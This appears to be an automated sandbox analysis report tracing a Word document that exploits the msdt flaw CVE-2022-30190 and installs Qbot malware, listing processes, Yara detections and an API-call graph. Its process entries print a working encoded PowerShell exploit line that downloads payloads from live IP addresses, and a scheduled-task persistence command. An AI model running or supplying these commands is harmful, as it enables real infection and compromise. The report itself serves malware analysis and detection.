                                                                                                                                                                      Data Ascii: o8tAPQSuH@T$SVWUJYqtC?9t7H;Ou@W1:u@B-tuKu]_^[D$8PHtAPQT$2=, Qv=( QwL$PQXD$H'=, Qv=( Q


                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:18:43:54
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                      Imagebase:0x980000
                                                                                                                                                                      File size:1937688 bytes
                                                                                                                                                                      MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:18:44:01
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                      Imagebase:0xcd0000
                                                                                                                                                                      File size:466688 bytes
                                                                                                                                                                      MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:2
                                                                                                                                                                      Start time:18:44:02
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                      Imagebase:0xcd0000
                                                                                                                                                                      File size:466688 bytes
                                                                                                                                                                      MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:18:44:11
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                                                      Imagebase:0x390000
                                                                                                                                                                      File size:1508352 bytes
                                                                                                                                                                      MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.544430061.00000000029A0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.544117188.0000000002910000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.544599667.00000000029A8000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.545886890.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:20
                                                                                                                                                                      Start time:18:44:42
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.cmdline
                                                                                                                                                                      Imagebase:0x1090000
                                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:21
                                                                                                                                                                      Start time:18:44:46
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6719.tmp" "c:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP"
                                                                                                                                                                      Imagebase:0xf80000
                                                                                                                                                                      File size:43176 bytes
                                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:22
                                                                                                                                                                      Start time:18:44:49
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.cmdline
                                                                                                                                                                      Imagebase:0x1090000
                                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:23
                                                                                                                                                                      Start time:18:44:51
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AFF.tmp" "c:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP"
                                                                                                                                                                      Imagebase:0xf80000
                                                                                                                                                                      File size:43176 bytes
                                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:26
                                                                                                                                                                      Start time:18:45:11
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
                                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001A.00000002.494919958.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001A.00000002.494919958.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001A.00000002.494431106.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:27
                                                                                                                                                                      Start time:18:45:12
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
                                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.496074932.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001B.00000002.495963327.0000000005310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001B.00000002.495963327.0000000005310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:28
                                                                                                                                                                      Start time:18:45:13
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
                                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001C.00000002.500357016.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.500357016.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.499646382.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:31
                                                                                                                                                                      Start time:18:45:32
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.cmdline
                                                                                                                                                                      Imagebase:0x1090000
                                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:32
                                                                                                                                                                      Start time:18:45:46
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES51A8.tmp" "c:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP"
                                                                                                                                                                      Imagebase:0xf80000
                                                                                                                                                                      File size:43176 bytes
                                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:33
                                                                                                                                                                      Start time:18:45:48
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0x10a0000
                                                                                                                                                                      File size:3611360 bytes
                                                                                                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000021.00000000.492939442.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:34
                                                                                                                                                                      Start time:18:45:48
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0x10a0000
                                                                                                                                                                      File size:3611360 bytes
                                                                                                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000022.00000000.493470383.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000022.00000002.497271923.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:36
                                                                                                                                                                      Start time:18:45:50
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      Imagebase:0x10a0000
                                                                                                                                                                      File size:3611360 bytes
                                                                                                                                                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000024.00000002.502484210.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000024.00000000.497169249.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:38
                                                                                                                                                                      Start time:18:45:52
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59
                                                                                                                                                                      Imagebase:0x270000
                                                                                                                                                                      File size:185856 bytes
                                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:39
                                                                                                                                                                      Start time:18:45:53
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff647620000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:40
                                                                                                                                                                      Start time:18:45:55
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t.A"
                                                                                                                                                                      Imagebase:0x7ff6e54f0000
                                                                                                                                                                      File size:24064 bytes
                                                                                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:41
                                                                                                                                                                      Start time:18:45:56
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline: -s "C:\Users\user\AppData\Local\Temp\t.A"
                                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000029.00000002.549011824.00000000033F0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000029.00000002.549011824.00000000033F0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000029.00000002.550245813.0000000003420000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000029.00000002.550560608.0000000003440000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:6.2%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                        Signature Coverage:3.5%
                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                        Total number of Limit Nodes:53
                                                                                                                                                                        execution_graph 13800 49e201c 13801 49e204f 13800->13801 13802 49e2047 13800->13802 13803 49e9930 2 API calls 13801->13803 13804 49e205f 13803->13804 13805 49e2094 13804->13805 13832 49e9aaf 13804->13832 13806 49e96f3 2 API calls 13805->13806 13808 49e20b2 13806->13808 13810 49ec307 2 API calls 13808->13810 13811 49e20c4 13810->13811 13813 49e20cb 13811->13813 13814 49ec0aa 5 API calls 13811->13814 13812 49e9930 2 API calls 13812->13805 13815 49e8bf4 2 API calls 13813->13815 13830 49e20db 13814->13830 13816 49e2242 13815->13816 13817 49e8bf4 2 API calls 13816->13817 13818 49e224d 13817->13818 13819 49e8bf4 2 API calls 13818->13819 13826 49e2259 13819->13826 13820 49e9df2 lstrlenA RtlAllocateHeap 13820->13830 13821 49e2281 13822 49e9c2c 2 API calls 13821->13822 13822->13802 13823 49e2276 13824 49e8bf4 2 API calls 13823->13824 13824->13821 13825 49e8bf4 2 API calls 13825->13826 13826->13821 13826->13823 13826->13825 13827 49e9a5a RtlAllocateHeap lstrcatW 13827->13830 13828 49e8baf HeapFree memset 13828->13830 13829 49eb5fb memset GetExitCodeProcess 13829->13830 13830->13813 13830->13820 13830->13827 13830->13828 13830->13829 13831 49e8bf4 HeapFree memset 13830->13831 13831->13830 13834 49e9ac6 13832->13834 13839 49e8bde RtlAllocateHeap 13834->13839 13835 49e207d 13835->13802 13835->13812 13836 49e9b07 lstrcatA 13837 49e9b1b lstrcatA 13836->13837 13838 49e9afc 13836->13838 13837->13838 13838->13835 13838->13836 13839->13838 13048 49e2297 13049 49e96f3 2 API calls 13048->13049 13050 49e22ce 13049->13050 13051 49ec307 2 API calls 13050->13051 13052 49e22e6 13051->13052 13053 49e22ed 13052->13053 13070 49ec0aa memset 13052->13070 13056 49e8bf4 2 API calls 13053->13056 13055 49e22fd 13055->13053 13062 49e9df2 2 API calls 13055->13062 13065 49e9a5a RtlAllocateHeap lstrcatW 13055->13065 13066 49e8baf HeapFree memset 13055->13066 13067 49e109a 2 API calls 13055->13067 13068 49eb5fb memset GetExitCodeProcess 13055->13068 13069 49e8bf4 HeapFree memset 13055->13069 13057 49e2434 13056->13057 13058 49e2450 13057->13058 13060 49e8bf4 2 API calls 13057->13060 13064 49e245b 13057->13064 13061 49e8bf4 2 API calls 13058->13061 13059 49e9c2c 2 API calls 13063 49e2468 13059->13063 13060->13057 13061->13064 13062->13055 13064->13059 13065->13055 13066->13055 13067->13055 13068->13055 13069->13055 13085 49e8bde RtlAllocateHeap 13070->13085 13072 49ec0d1 13073 49e98bd RtlAllocateHeap 13072->13073 13084 49ec155 13072->13084 13074 49ec0ef 13073->13074 13075 49e98bd RtlAllocateHeap 13074->13075 13076 49ec102 13075->13076 13077 49e98bd RtlAllocateHeap 13076->13077 13078 49ec116 13077->13078 13079 49e9df2 2 API calls 13078->13079 13080 49ec123 13079->13080 13081 49e8baf 2 API calls 13080->13081 13082 49ec149 13081->13082 13083 49e98bd RtlAllocateHeap 13082->13083 13083->13084 13084->13055 13085->13072 13121 49e598e 13126 49ee4e0 13121->13126 13124 49e59ac 13125 49e59a3 GetLastError 13125->13124 13151 49e8bde RtlAllocateHeap 13126->13151 13128 49ee4f7 13129 49e98bd RtlAllocateHeap 13128->13129 13148 49e599f 13128->13148 13130 49ee50c 13129->13130 13130->13148 13152 49ea46b 13130->13152 13133 49e9df2 2 API calls 13134 49ee52c 13133->13134 13135 49e9e51 2 API calls 13134->13135 13136 49ee541 13135->13136 13137 49e8baf 2 API calls 13136->13137 13138 49ee54a 13137->13138 13160 49ee330 13138->13160 13140 49ee554 13141 49ee55b 13140->13141 13167 49ee374 13140->13167 13143 49e8bf4 2 API calls 13141->13143 13144 49ee62e 13143->13144 13145 49e8bf4 2 API calls 13144->13145 13146 49ee639 13145->13146 13147 49e8bf4 2 API calls 13146->13147 13147->13148 13148->13124 13148->13125 13149 49ee56a 13149->13141 13150 49ee601 lstrlenW 13149->13150 13150->13149 13151->13128 13154 49ea484 13152->13154 13153 49ea584 13153->13133 13154->13153 13155 49ea4ff 13154->13155 13156 49e8c72 3 API calls 13154->13156 13157 49ea55c 13155->13157 13180 49e8ce0 13155->13180 13156->13155 13157->13153 13158 49e8d6d memset 13157->13158 13158->13153 13161 49e9df2 2 API calls 13160->13161 13162 49ee342 13161->13162 13184 49e9d18 13162->13184 13165 49e8baf 2 API calls 13166 49ee357 13165->13166 13166->13140 13168 49e9a5a 2 API calls 13167->13168 13169 49ee38d CoInitializeEx 13168->13169 13170 49e9df2 2 API calls 13169->13170 13171 49ee3a8 13170->13171 13172 49e9df2 2 API calls 13171->13172 13173 49ee3b9 13172->13173 13174 49e8baf 2 API calls 13173->13174 13175 49ee3d5 13174->13175 13176 49e8baf 2 API calls 13175->13176 13177 49ee3eb 13176->13177 13178 49e8bf4 2 API calls 13177->13178 13179 49ee3f6 13178->13179 13179->13149 13181 49e8d01 lstrlenA 13180->13181 13183 49e8d35 13181->13183 13183->13155 13183->13183 13185 49e96f3 2 API calls 13184->13185 13186 49e9d39 13185->13186 13187 49e9a5a 2 API calls 13186->13187 13188 49e9d5a 13187->13188 13188->13165 13858 49e1301 13859 49ea91d 4 API calls 13858->13859 13860 49e1318 13859->13860 13861 49e133d 13860->13861 13862 49f3674 2 API calls 13860->13862 13896 49e11e9 13861->13896 13862->13861 13868 49eb179 4 API calls 13870 49e1457 13868->13870 13872 49eb266 5 API calls 13870->13872 13871 49e13a9 13881 49e8bf4 2 API calls 13871->13881 13873 49e1463 13872->13873 14095 49e79c0 13873->14095 13874 49ea9f0 4 API calls 13878 49e13d4 13874->13878 13891 49e13dd 13878->13891 13921 49e687d 13878->13921 13887 49e1372 13881->13887 13882 49e14aa 13882->13871 13890 49e111d 8 API calls 13882->13890 13883 49e1498 14120 49e111d 13883->14120 13888 49e14a4 14130 49e10ec 13888->14130 13890->13888 14068 49eb179 13891->14068 13895 49e1440 13895->13868 13897 49e9dd8 2 API calls 13896->13897 13898 49e11fa 13897->13898 13899 49e9a07 2 API calls 13898->13899 13900 49e1216 13899->13900 13901 49e8b9c 2 API calls 13900->13901 13902 49e1223 13901->13902 13902->13887 13903 49ea9f0 13902->13903 13904 49eaa00 4 API calls 13903->13904 13905 49e1382 13904->13905 13905->13895 13906 49e7b4d 13905->13906 14138 49e7d9b 